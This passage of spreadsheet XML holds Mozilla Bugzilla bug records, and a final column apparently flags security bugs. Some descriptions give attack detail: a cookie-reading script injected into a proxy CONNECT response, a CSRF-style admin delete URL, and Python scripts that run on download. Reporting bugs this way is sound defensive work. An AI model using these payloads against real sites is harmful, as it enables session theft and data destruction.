        <v>1</v>
      </c>
      <c r="F1250" t="n">
        <v>1</v>
      </c>
      <c r="G1250" t="n">
        <v>3</v>
      </c>
      <c r="H1250" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1250" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1250" t="inlineStr">
        <is>
          <t>Audio/Video: MediaStreamGraph</t>
        </is>
      </c>
      <c r="K1250" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1250" t="inlineStr">
        <is>
          <t>[adv-main44+][adv-esr38.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1250" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1250" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1250" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T1250" t="n">
        <v>1</v>
      </c>
      <c r="U1250" t="n">
        <v>0</v>
      </c>
      <c r="V1250" t="n">
        <v>39</v>
      </c>
      <c r="W1250" t="inlineStr">
        <is>
          <t>Created attachment 8685824
testcase
Assertion failure: cycleStackMarker == ps-&gt;mCycleMarker, at dom/media/MediaStreamGraph.cpp:506</t>
        </is>
      </c>
      <c r="X1250" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" t="n">
        <v>281181</v>
      </c>
      <c r="B1251" t="inlineStr">
        <is>
          <t>2005-02-05 10:13:51 -0800</t>
        </is>
      </c>
      <c r="C1251" t="inlineStr">
        <is>
          <t>[SECURITY] It's way too easy to delete versions/components/milestones etc...</t>
        </is>
      </c>
      <c r="D1251" t="inlineStr">
        <is>
          <t>2008-11-25 11:32:49 -0800</t>
        </is>
      </c>
      <c r="E1251" t="n">
        <v>1</v>
      </c>
      <c r="F1251" t="n">
        <v>1</v>
      </c>
      <c r="G1251" t="n">
        <v>4</v>
      </c>
      <c r="H1251" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1251" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1251" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1251" t="inlineStr">
        <is>
          <t>2.19</t>
        </is>
      </c>
      <c r="L1251" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1251" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1251" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1251" t="inlineStr">
        <is>
          <t>[ready for 2.22.1][ready for 2.23.3]</t>
        </is>
      </c>
      <c r="Q1251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1251" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1251" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T1251" t="n">
        <v>1</v>
      </c>
      <c r="U1251" t="n">
        <v>0</v>
      </c>
      <c r="V1251" t="n">
        <v>37</v>
      </c>
      <c r="W1251" t="inlineStr">
        <is>
          <t>This may have been covered before a long time ago, and not been considered an issue, but if I could 
get an admin to click on the following URL (which is intentionally broken to avoid any accidents, but 
you get the point), this could really mess things up, couldn't it? 
http://bugzilla.mozilla.gorg/editversions.cgi?action=delete&amp;product=Bugzilla&amp;version=2.19
I'm thinking there should be some sort of token passing going on from the intermediate 'are you sure 
you want to delete' page???</t>
        </is>
      </c>
      <c r="X1251" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" t="n">
        <v>1563327</v>
      </c>
      <c r="B1252" t="inlineStr">
        <is>
          <t>2019-07-03 11:14:36 -0700</t>
        </is>
      </c>
      <c r="C1252" t="inlineStr">
        <is>
          <t>Prevent users from uploading langpacks containing exploits to AMO</t>
        </is>
      </c>
      <c r="D1252" t="inlineStr">
        <is>
          <t>2020-06-04 23:41:36 -0700</t>
        </is>
      </c>
      <c r="E1252" t="n">
        <v>1</v>
      </c>
      <c r="F1252" t="n">
        <v>1</v>
      </c>
      <c r="G1252" t="n">
        <v>4</v>
      </c>
      <c r="H1252" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1252" t="inlineStr">
        <is>
          <t>addons.mozilla.org</t>
        </is>
      </c>
      <c r="J1252" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1252" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1252" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1252" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1252" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1252" t="inlineStr"/>
      <c r="Q1252" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1252" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1252" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1252" t="n">
        <v>1</v>
      </c>
      <c r="U1252" t="n">
        <v>0</v>
      </c>
      <c r="V1252" t="n">
        <v>19</v>
      </c>
      <c r="W1252" t="inlineStr">
        <is>
          <t>In bug 1538007, we were faced with the possibility of a sandbox escape executed by installing a malicious language pack. While we've made a number of changes to Firefox, especially on 68 onwards, to defeat this attack in the product, as part of defense in depth improvements and to help protect users on older versions (especially ESR), it would be desirable to refuse to sign language packs that contain markup in their locale strings that doesn't pass some sanitizer list of allowed element/attribute/value combinations.</t>
        </is>
      </c>
      <c r="X1252" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" t="n">
        <v>675732</v>
      </c>
      <c r="B1253" t="inlineStr">
        <is>
          <t>2011-08-01 13:58:51 -0700</t>
        </is>
      </c>
      <c r="C1253" t="inlineStr">
        <is>
          <t>Tracking bug for build &amp; release of Firefox and Fennec 6.0b5</t>
        </is>
      </c>
      <c r="D1253" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1253" t="n">
        <v>1</v>
      </c>
      <c r="F1253" t="n">
        <v>1</v>
      </c>
      <c r="G1253" t="n">
        <v>5</v>
      </c>
      <c r="H1253" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1253" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1253" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1253" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1253" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1253" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1253" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1253" t="inlineStr"/>
      <c r="Q1253" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1253" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1253" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1253" t="n">
        <v>1</v>
      </c>
      <c r="U1253" t="n">
        <v>0</v>
      </c>
      <c r="V1253" t="n">
        <v>11</v>
      </c>
      <c r="W1253" t="inlineStr">
        <is>
          <t>Waiting for "go to build".</t>
        </is>
      </c>
      <c r="X1253" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" t="n">
        <v>284362</v>
      </c>
      <c r="B1254" t="inlineStr">
        <is>
          <t>2005-03-01 16:57:02 -0800</t>
        </is>
      </c>
      <c r="C1254" t="inlineStr">
        <is>
          <t>FTP/HTTP: hostname passed to OnStatus should be UTF-8</t>
        </is>
      </c>
      <c r="D1254" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E1254" t="n">
        <v>1</v>
      </c>
      <c r="F1254" t="n">
        <v>1</v>
      </c>
      <c r="G1254" t="n">
        <v>6</v>
      </c>
      <c r="H1254" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1254" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1254" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K1254" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1254" t="inlineStr"/>
      <c r="Q1254" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1254" t="inlineStr">
        <is>
          <t>mozilla1.8beta2</t>
        </is>
      </c>
      <c r="T1254" t="n">
        <v>1</v>
      </c>
      <c r="U1254" t="n">
        <v>0</v>
      </c>
      <c r="V1254" t="n">
        <v>8</v>
      </c>
      <c r="W1254" t="inlineStr">
        <is>
          <t>see url. this should probably be UTF-8, given IDN...</t>
        </is>
      </c>
      <c r="X1254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" t="n">
        <v>479880</v>
      </c>
      <c r="B1255" t="inlineStr">
        <is>
          <t>2009-02-23 15:16:20 -0800</t>
        </is>
      </c>
      <c r="C1255" t="inlineStr">
        <is>
          <t>Non-200 responses to proxy CONNECT requests lead to attacks on HTTPS</t>
        </is>
      </c>
      <c r="D1255" t="inlineStr">
        <is>
          <t>2019-05-24 08:38:06 -0700</t>
        </is>
      </c>
      <c r="E1255" t="n">
        <v>1</v>
      </c>
      <c r="F1255" t="n">
        <v>1</v>
      </c>
      <c r="G1255" t="n">
        <v>3</v>
      </c>
      <c r="H1255" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1255" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1255" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K1255" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1255" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1255" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q1255" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1255" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1255" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1255" t="n">
        <v>1</v>
      </c>
      <c r="U1255" t="n">
        <v>0</v>
      </c>
      <c r="V1255" t="n">
        <v>81</v>
      </c>
      <c r="W1255" t="inlineStr">
        <is>
          <t>I bet this bug is already on file, but I don't have access to all the security bugs so I'm filing this one in the hopes that it gets duped against an existing bug.
Threat Model:
1) The user has a proxy server configured.
2) There is an active network attacker.
3) The user visits https://www.paypal.com/
Attack:
The browser issues a CONNECT request to the proxy server.  The active network attacker intercepts this request and replies with the following bytes:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=ISO-8859-1
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
The browser happily runs the network attacker's script in the https://www.paypal.com security origin, causing disaster.
Chromium received this bug report (and additional related bugs involving redirects) from Microsoft.  My understanding is that some researchers from MSR are going to present about these bugs as the upcoming Oakland Security Conference.  We should coordinate so we fix this issue in the same way.  More details are available at &lt;http://code.google.com/p/chromium/issues/detail?id=7338&gt;, which I can give you access to.
Thanks,
Adam</t>
        </is>
      </c>
      <c r="X1255" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" t="n">
        <v>53986</v>
      </c>
      <c r="B1256" t="inlineStr">
        <is>
          <t>2000-09-24 18:04:53 -0700</t>
        </is>
      </c>
      <c r="C1256" t="inlineStr">
        <is>
          <t>Kerz needs to realize he's not God</t>
        </is>
      </c>
      <c r="D1256" t="inlineStr">
        <is>
          <t>2011-08-05 21:16:54 -0700</t>
        </is>
      </c>
      <c r="E1256" t="n">
        <v>1</v>
      </c>
      <c r="F1256" t="n">
        <v>1</v>
      </c>
      <c r="G1256" t="n">
        <v>5</v>
      </c>
      <c r="H1256" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1256" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J1256" t="inlineStr">
        <is>
          <t>Miscellaneous</t>
        </is>
      </c>
      <c r="K1256" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1256" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1256" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1256" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1256" t="inlineStr"/>
      <c r="Q1256" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1256" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1256" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1256" t="n">
        <v>1</v>
      </c>
      <c r="U1256" t="n">
        <v>0</v>
      </c>
      <c r="V1256" t="n">
        <v>6</v>
      </c>
      <c r="W1256" t="inlineStr">
        <is>
          <t>This is a recent regression. I used to find the topics in #mozillazine very 
humorous or at least informative. Now all I get are silly attempts at 
funniness. Can _someone_ please do something about this?</t>
        </is>
      </c>
      <c r="X1256" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" t="n">
        <v>1393659</v>
      </c>
      <c r="B1257" t="inlineStr">
        <is>
          <t>2017-08-24 19:14:25 -0700</t>
        </is>
      </c>
      <c r="C1257" t="inlineStr">
        <is>
          <t>Desktop confusion between max_post_bytes and max_request_bytes</t>
        </is>
      </c>
      <c r="D1257" t="inlineStr">
        <is>
          <t>2017-11-08 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E1257" t="n">
        <v>1</v>
      </c>
      <c r="F1257" t="n">
        <v>1</v>
      </c>
      <c r="G1257" t="n">
        <v>2</v>
      </c>
      <c r="H1257" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1257" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1257" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1257" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1257" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1257" t="inlineStr"/>
      <c r="Q1257" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1257" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1257" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1257" t="n">
        <v>1</v>
      </c>
      <c r="U1257" t="n">
        <v>0</v>
      </c>
      <c r="V1257" t="n">
        <v>18</v>
      </c>
      <c r="W1257" t="inlineStr">
        <is>
          <t>When batching is disabled, info/configuration returns something like:
&gt; {"max_request_bytes": 1048576, "max_record_payload_bytes": 262144}
and when enabled it looks like:
&gt; {'max_post_records': 100, 'max_post_bytes': 1048576, 'max_total_bytes': 104857600, 'max_total_records': 10000, 'max_record_payload_bytes': 262144}
Note that the first has max_request_bytes but not max_post_bytes, whereas the second has the latter but not the former.
Adding confusion, desktop handles max sizes in 2 different places - http://searchfox.org/mozilla-central/rev/5696c3e525fc8222674eed6a562f5fcbe804c4c7/services/sync/modules/engines.js#1681 and http://searchfox.org/mozilla-central/rev/5696c3e525fc8222674eed6a562f5fcbe804c4c7/services/sync/modules/record.js#911, generating different errors.
IMO we should have a single place that rejects records based on the size, and have that single place handle both these values in a sane way, otherwise when we increase the max record size on the server it may not have the desired effect, particularly if we need to disable batching in the future.</t>
        </is>
      </c>
      <c r="X1257" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" t="n">
        <v>1568003</v>
      </c>
      <c r="B1258" t="inlineStr">
        <is>
          <t>2019-07-22 12:20:52 -0700</t>
        </is>
      </c>
      <c r="C1258" t="inlineStr">
        <is>
          <t>On Windows, python files get executed instead of opened by notepad, because both Windows and the network suggest the file is text/plain, but ShellExecuteW will then open the file with python</t>
        </is>
      </c>
      <c r="D1258" t="inlineStr">
        <is>
          <t>2023-06-28 15:18:54 -0700</t>
        </is>
      </c>
      <c r="E1258" t="n">
        <v>1</v>
      </c>
      <c r="F1258" t="n">
        <v>1</v>
      </c>
      <c r="G1258" t="n">
        <v>2</v>
      </c>
      <c r="H1258" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1258" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1258" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1258" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L1258" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1258" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N1258" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1258" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main72+]</t>
        </is>
      </c>
      <c r="Q1258" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1258" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1258" t="inlineStr">
        <is>
          <t>Firefox 72</t>
        </is>
      </c>
      <c r="T1258" t="n">
        <v>1</v>
      </c>
      <c r="U1258" t="n">
        <v>0</v>
      </c>
      <c r="V1258" t="n">
        <v>82</v>
      </c>
      <c r="W1258" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Steps to reproduce:
Python need to be set in environment variables in client machine and in browser, in the application settings the content type as always ask.If some python code is there in google drive or office 365 and user clicks on download a pop up appears with 2 options - save file and open file. If user selects open file the python script will get executed. If the script is malicious it can perform malicious activity. Even it can connect remote server to download malicious file to file system.
Actual results:
Python script got executed by selecting open option.
Expected results:
Malicious code execution leading system compromise, change in OS level, delete of data etc.</t>
        </is>
      </c>
      <c r="X1258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" t="n">
        <v>489041</v>
      </c>
      <c r="B1259" t="inlineStr">
        <is>
          <t>2009-04-18 21:11:06 -0700</t>
        </is>
      </c>
      <c r="C1259" t="inlineStr">
        <is>
          <t>Atom table crash triggered by DOM mutation events and unicode surrogates</t>
        </is>
      </c>
      <c r="D1259" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1259" t="n">
        <v>1</v>
      </c>
      <c r="F1259" t="n">
        <v>1</v>
      </c>
      <c r="G1259" t="n">
        <v>3</v>
      </c>
      <c r="H1259" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1259" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1259" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1259" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L1259" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1259" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1259" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1259" t="inlineStr">
        <is>
          <t>[sg:critical?] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1259" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1259" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1259" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1259" t="n">
        <v>1</v>
      </c>
      <c r="U1259" t="n">
        <v>0</v>
      </c>
      <c r="V1259" t="n">
        <v>10</v>
      </c>
      <c r="W1259" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #395651 +++
Created an attachment (id=280323)
testcase (causes shutdown crash)
This still crashes 1.9.0 on shutdown on Mac and Windows at least. security sensitive since the original was sg:critical and !exploitable says:
Probably Exploitable - Data from Faulting Address controls Code Flow starting at xpcom_core!AtomTableClearEntry+0x2b
#0  0x00000001 in ?? ()
#1  0x002de388 in AtomTableClearEntry (table=0x3a6700, entry=0x153f4738) at /work/mozilla/builds/1.9.0/mozilla/xpcom/ds/nsAtomTable.cpp:325
#2  0x002c2a4c in PL_DHashTableFinish (table=0x3a6700) at pldhash.c:373
#3  0x002ddda8 in NS_PurgeAtomTable () at /work/mozilla/builds/1.9.0/mozilla/xpcom/ds/nsAtomTable.cpp:414
#4  0x002da5d6 in NS_ShutdownXPCOM_P (servMgr=0x0) at /work/mozilla/builds/1.9.0/mozilla/xpcom/build/nsXPComInit.cpp:841
#5  0x000bc051 in ScopedXPCOMStartup::~ScopedXPCOMStartup (this=0xbfffe7ac) at /work/mozilla/builds/1.9.0/mozilla/toolkit/xre/nsAppRunner.cpp:931
#6  0x000bc09f in ScopedXPCOMStartup::~ScopedXPCOMStartup (this=0xbfffe7ac) at /work/mozilla/builds/1.9.0/mozilla/toolkit/xre/nsAppRunner.cpp:934
#7  0x000c2e18 in XRE_main (argc=4, argv=0xbfffea1c, aAppData=0x60dad0) at /work/mozilla/builds/1.9.0/mozilla/toolkit/xre/nsAppRunner.cpp:3237
#8  0x000026d3 in main (argc=4, argv=0xbfffea1c) at /work/mozilla/builds/1.9.0/mozilla/browser/app/nsBrowserApp.cpp:158</t>
        </is>
      </c>
      <c r="X1259" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" t="n">
        <v>113508</v>
      </c>
      <c r="B1260" t="inlineStr">
        <is>
          <t>2001-12-04 15:11:29 -0800</t>
        </is>
      </c>
      <c r="C1260" t="inlineStr">
        <is>
          <t>Identical URIs do not compare via nsIURI::Equals</t>
        </is>
      </c>
      <c r="D1260" t="inlineStr">
        <is>
          <t>2001-12-05 15:59:30 -0800</t>
        </is>
      </c>
      <c r="E1260" t="n">
        <v>1</v>
      </c>
      <c r="F1260" t="n">
        <v>1</v>
      </c>
      <c r="G1260" t="n">
        <v>3</v>
      </c>
      <c r="H1260" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1260" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1260" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1260" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1260" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1260" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1260" t="inlineStr">
        <is>
          <t>[ready-to-land]</t>
        </is>
      </c>
      <c r="Q1260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1260" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1260" t="inlineStr">
        <is>
          <t>mozilla0.9.7</t>
        </is>
      </c>
      <c r="T1260" t="n">
        <v>1</v>
      </c>
      <c r="U1260" t="n">
        <v>0</v>
      </c>
      <c r="V1260" t="n">
        <v>9</v>
      </c>
      <c r="W1260" t="inlineStr">
        <is>
          <t>If I create a new URI object (e.g. via NS_NewURI) from "http://cnn" and another
from "http://cnn/", they both become a URI with a "http://cnn/" spec but calling
uri1-&gt;Equal(uri2, &amp;isEqual) returns PR_FALSE.
It looks like that trailing slash on the input screws up how mBasename is
calculated, so when they are compared, the URLSegments differ. In particular
mBasename.mLen is -1 in the first and 0 in the second. 
Aside from being wrong it may impact the performance of the cache and other areas.</t>
        </is>
      </c>
      <c r="X1260" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" t="n">
        <v>1540541</v>
      </c>
      <c r="B1261" t="inlineStr">
        <is>
          <t>2019-03-31 09:00:26 -0700</t>
        </is>
      </c>
      <c r="C1261" t="inlineStr">
        <is>
          <t>PK11_ImportDERPrivateKeyInfoAndReturnKey causes OOB read when importing private keys with leading 0x00 bytes</t>
        </is>
      </c>
      <c r="D1261" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:51 -0700</t>
        </is>
      </c>
      <c r="E1261" t="n">
        <v>1</v>
      </c>
      <c r="F1261" t="n">
        <v>1</v>
      </c>
      <c r="G1261" t="n">
        <v>3</v>
      </c>
      <c r="H1261" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1261" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1261" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1261" t="inlineStr">
        <is>
          <t>3.43</t>
        </is>
      </c>
      <c r="L1261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1261" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1261" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1261" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1261" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1261" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1261" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1261" t="inlineStr">
        <is>
          <t>3.45</t>
        </is>
      </c>
      <c r="T1261" t="n">
        <v>1</v>
      </c>
      <c r="U1261" t="n">
        <v>0</v>
      </c>
      <c r="V1261" t="n">
        <v>13</v>
      </c>
      <c r="W1261" t="inlineStr">
        <is>
          <t>Created attachment 9054765
Test C program that exercises the potential bug in PK11_ImportDERPrivateKeyInfoAndReturnKey
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
The attached C program exercises the bug. To reproduce:
1) Import a curve25519 private key in PKCS#8 format using `PK11_ImportDERPrivateKeyInfoAndReturnKey`, where one or more of the leading bytes of the key is 0x00. The import operation succeeds. I am importing a key in the format used here:
  https://searchfox.org/nss/rev/cfd5fcba7efbfe116e2c08848075240ec3a92718/gtests/pk11_gtest/pk11_curve25519_unittest.cc#66
2) Try to use the private key for DH key agreement (e.g., with `PK11_PubDeriveWithKDF`). The operation succeeds but returns an incorrect results. Furthermore, in the process, the operation makes what I believe is an OOB read.
Actual results:
1) When importing a key using `PK11_ImportDERPrivateKeyInfoAndReturnKey`, the import operation strips leading 0x00 bytes from the private key:
  https://searchfox.org/mozilla-central/source/security/nss/lib/pk11wrap/pk11pk12.c#530
2) Later on, when using `PK11_PubDeriveWithKDF` to use this secret curve25519 key to derive a DH secret, `ECDH_Derive` is invoked here:
  https://searchfox.org/mozilla-central/source/security/nss/lib/freebl/ec.c#523
3) I believe that `ECDH_Derive` then invokes `ec_Curve25519_mul` here:
  https://searchfox.org/mozilla-central/source/security/nss/lib/freebl/ecl/ecp_25519.c#l
